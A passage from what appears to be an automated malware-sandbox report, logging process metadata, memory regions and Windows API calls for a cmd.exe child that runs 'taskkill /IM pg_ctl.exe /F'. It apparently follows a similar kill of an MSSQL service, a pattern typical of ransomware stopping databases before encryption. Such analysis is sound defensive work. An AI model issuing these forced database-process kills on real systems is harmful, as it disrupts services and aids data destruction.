MSSQL$SQLEXPRESS" [0128.316] exit (_Code=2) Thread: id = 401 os_tid = 0xe3c Process: id = "106" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x255a4000" os_pid = "0xe2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c taskkill \\/IM pg_ctl.exe \\/F" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6318 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6319 start_va = 0xde0000 end_va = 0x4ddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 6320 start_va = 0x4de0000 end_va = 0x4dfffff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 6321 start_va = 0x4e00000 end_va = 0x4e00fff entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 6322 start_va = 0x4e10000 end_va = 0x4e23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e10000" filename = "" Region: id = 6323 start_va = 0x4e30000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 6324 start_va = 0x4e70000 end_va = 0x4f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 6325 start_va = 0x4f70000 end_va = 0x4f73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f70000" filename = "" Region: id = 6326 start_va = 0x4f80000 end_va = 0x4f80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f80000" filename = "" Region: id = 6327 start_va = 0x4f90000 end_va = 0x4f91fff entry_point = 0x0 region_type = private name = "private_0x0000000004f90000" filename = "" Region: id = 6328 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6329 start_va = 0x7f2a0000 end_va = 0x7f2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f2a0000" filename = "" Region: id = 6330 start_va = 0x7f2c9000 end_va = 0x7f2c9fff entry_point = 0x0 region_type = private name = "private_0x000000007f2c9000" filename = "" Region: id = 6331 start_va = 0x7f2ca000 end_va = 0x7f2ccfff entry_point = 0x0 region_type = private name = "private_0x000000007f2ca000" filename = "" Region: id = 6332 start_va = 0x7f2cd000 end_va = 0x7f2cdfff entry_point = 0x0 region_type = private name = "private_0x000000007f2cd000" filename = "" Region: id = 6333 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6334 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6335 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6336 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6337 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6338 start_va = 0x5170000 end_va = 0x517ffff entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 6339 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6340 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6341 start_va = 0x5260000 end_va = 0x535ffff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 6342 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6383 start_va = 0x4de0000 end_va = 0x4deffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004de0000" filename = "" Region: id = 6384 start_va = 0x4fa0000 end_va = 0x505dfff entry_point = 0x4fa0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6385 start_va = 0x5060000 end_va = 0x509ffff entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 6386 start_va = 0x5360000 end_va = 0x545ffff entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 6387 start_va = 0x5550000 end_va = 0x555ffff entry_point = 0x0 region_type = private name = "private_0x0000000005550000" filename = "" Region: id = 6388 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6389 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6390 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6391 start_va = 0x7f1a0000 end_va = 0x7f29ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1a0000" filename = "" Region: id = 6392 start_va = 0x7f2c6000 end_va = 0x7f2c8fff entry_point = 0x0 region_type = private name = "private_0x000000007f2c6000" filename = "" Region: id = 6393 start_va = 0x4df0000 end_va = 0x4df3fff entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 6394 start_va = 0x4e00000 end_va = 0x4e03fff entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 6395 start_va = 0x5560000 end_va = 0x5896fff entry_point = 0x5560000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 402 os_tid = 0xe1c [0128.467] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0128.467] __set_app_type (_Type=0x1) [0128.467] __p__fmode () returned 0x77ac4d6c [0128.467] __p__commode () returned 0x77ac5b1c [0128.467] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0128.467] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0128.468] GetCurrentThreadId () returned 0xe1c [0128.468] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe1c) returned 0x84 [0128.468] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0128.468] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0128.468] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.470] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.470] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4f6fb80 | out: phkResult=0x4f6fb80*=0x0) returned 0x2 [0128.470] VirtualQuery (in: lpAddress=0x4f6fb87, lpBuffer=0x4f6fb38, dwLength=0x1c | out: lpBuffer=0x4f6fb38*(BaseAddress=0x4f6f000, AllocationBase=0x4e70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.470] VirtualQuery (in: lpAddress=0x4e70000, lpBuffer=0x4f6fb38, dwLength=0x1c | out: lpBuffer=0x4f6fb38*(BaseAddress=0x4e70000, AllocationBase=0x4e70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.470] VirtualQuery (in: lpAddress=0x4e71000, lpBuffer=0x4f6fb38, dwLength=0x1c | out: lpBuffer=0x4f6fb38*(BaseAddress=0x4e71000, AllocationBase=0x4e70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.470] VirtualQuery (in: lpAddress=0x4e73000, lpBuffer=0x4f6fb38, dwLength=0x1c | out: lpBuffer=0x4f6fb38*(BaseAddress=0x4e73000, AllocationBase=0x4e70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.470] VirtualQuery (in: lpAddress=0x4f70000, lpBuffer=0x4f6fb38, dwLength=0x1c | out: lpBuffer=0x4f6fb38*(BaseAddress=0x4f70000, AllocationBase=0x4f70000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0128.470] GetConsoleOutputCP () returned 0x1b5 [0128.471] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0128.471] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0128.471] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.471] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0128.471] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.471] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0128.471] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.471] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0128.471] _get_osfhandle (_FileHandle=0) returned 0x38 [0128.471] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0128.471] _get_osfhandle (_FileHandle=0) returned 0x38 [0128.471] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0128.472] GetEnvironmentStringsW () returned 0x5267d70* [0128.472] FreeEnvironmentStringsA (penv="A") returned 1 [0128.472] GetEnvironmentStringsW () returned 0x5267d70* [0128.472] FreeEnvironmentStringsA (penv="A") returned 1 [0128.472] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f6eae4 | out: phkResult=0x4f6eae4*=0x94) returned 0x0 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x0, lpData=0x4f6eaf0*=0xc0, lpcbData=0x4f6eaec*=0x1000) returned 0x2 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x4, lpData=0x4f6eaf0*=0x1, lpcbData=0x4f6eaec*=0x4) returned 0x0 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x0, lpData=0x4f6eaf0*=0x1, lpcbData=0x4f6eaec*=0x1000) returned 0x2 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x4, lpData=0x4f6eaf0*=0x0, lpcbData=0x4f6eaec*=0x4) returned 0x0 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x4, lpData=0x4f6eaf0*=0x40, lpcbData=0x4f6eaec*=0x4) returned 0x0 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x4, lpData=0x4f6eaf0*=0x40, lpcbData=0x4f6eaec*=0x4) returned 0x0 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x0, lpData=0x4f6eaf0*=0x40, lpcbData=0x4f6eaec*=0x1000) returned 0x2 [0128.472] RegCloseKey (hKey=0x94) returned 0x0 [0128.472] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f6eae4 | out: phkResult=0x4f6eae4*=0x94) returned 0x0 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x0, lpData=0x4f6eaf0*=0x40, lpcbData=0x4f6eaec*=0x1000) returned 0x2 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x4, lpData=0x4f6eaf0*=0x1, lpcbData=0x4f6eaec*=0x4) returned 0x0 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x0, lpData=0x4f6eaf0*=0x1, lpcbData=0x4f6eaec*=0x1000) returned 0x2 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x4, lpData=0x4f6eaf0*=0x0, lpcbData=0x4f6eaec*=0x4) returned 0x0 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x4, lpData=0x4f6eaf0*=0x9, lpcbData=0x4f6eaec*=0x4) returned 0x0 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x4, lpData=0x4f6eaf0*=0x9, lpcbData=0x4f6eaec*=0x4) returned 0x0 [0128.472] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f6eae8, lpData=0x4f6eaf0, lpcbData=0x4f6eaec*=0x1000 | out: lpType=0x4f6eae8*=0x0, lpData=0x4f6eaf0*=0x9, lpcbData=0x4f6eaec*=0x1000) returned 0x2 [0128.473] RegCloseKey (hKey=0x94) returned 0x0 [0128.473] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29831 [0128.473] srand (_Seed=0x5ad29831) [0128.473] GetCommandLineW () returned="/c taskkill \\/IM pg_ctl.exe \\/F" [0128.473] GetCommandLineW () returned="/c taskkill \\/IM pg_ctl.exe \\/F" [0128.473] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.473] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5269cc8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0128.473] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0128.473] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.473] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.473] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.473] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.473] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.473] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.473] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.473] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.473] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.473] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.473] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.473] GetEnvironmentStringsW () returned 0x5267d70* [0128.473] FreeEnvironmentStringsA (penv="A") returned 1 [0128.473] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.473] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.473] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.473] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.473] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.473] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.473] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.473] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.474] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.474] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.474] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4f6f8bc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.474] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4f6f8bc, lpFilePart=0x4f6f8b4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f6f8b4*="Desktop") returned 0x1d [0128.474] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0128.474] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4f6f638 | out: lpFindFileData=0x4f6f638) returned 0x52605c8 [0128.474] FindClose (in: hFindFile=0x52605c8 | out: hFindFile=0x52605c8) returned 1 [0128.474] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4f6f638 | out: lpFindFileData=0x4f6f638) returned 0x52605c8 [0128.474] FindClose (in: hFindFile=0x52605c8 | out: hFindFile=0x52605c8) returned 1 [0128.474] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0128.474] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4f6f638 | out: lpFindFileData=0x4f6f638) returned 0x52605c8 [0128.474] FindClose (in: hFindFile=0x52605c8 | out: hFindFile=0x52605c8) returned 1 [0128.474] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0128.474] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0128.474] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0128.474] GetEnvironmentStringsW () returned 0x5267d70* [0128.475] FreeEnvironmentStringsA (penv="=") returned 1 [0128.475] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.475] GetConsoleOutputCP () returned 0x1b5 [0128.475] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0128.475] GetUserDefaultLCID () returned 0x409 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4f6f9ec, cchData=128 | out: lpLCData="0") returned 2 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4f6f9ec, cchData=128 | out: lpLCData="0") returned 2 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4f6f9ec, cchData=128 | out: lpLCData="1") returned 2 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0128.475] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0128.476] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0128.476] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.476] GetConsoleTitleW (in: lpConsoleTitle=0x526a9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.476] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0128.476] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0128.477] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0128.477] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0128.477] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0128.477] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0128.477] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0128.477] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0128.477] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0128.477] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0128.477] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0128.478] GetConsoleTitleW (in: lpConsoleTitle=0x4f6f6d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.479] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0128.479] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0128.479] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0128.479] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0128.479] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0128.479] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0128.479] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0128.479] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0128.479] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0128.479] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0128.479] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0128.479] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0128.479] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0128.479] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0128.479] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0128.479] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0128.479] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0128.479] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0128.479] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0128.479] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0128.479] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0128.479] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0128.479] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0128.479] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0128.479] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0128.479] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0128.479] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0128.479] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0128.479] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0128.479] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0128.479] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0128.479] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0128.479] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0128.479] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0128.479] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0128.479] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0128.479] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0128.479] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0128.479] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0128.479] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0128.479] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0128.479] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0128.479] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0128.479] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0128.479] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0128.479] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0128.479] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0128.479] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0128.479] _wcsicmp (_String1="taskkill", 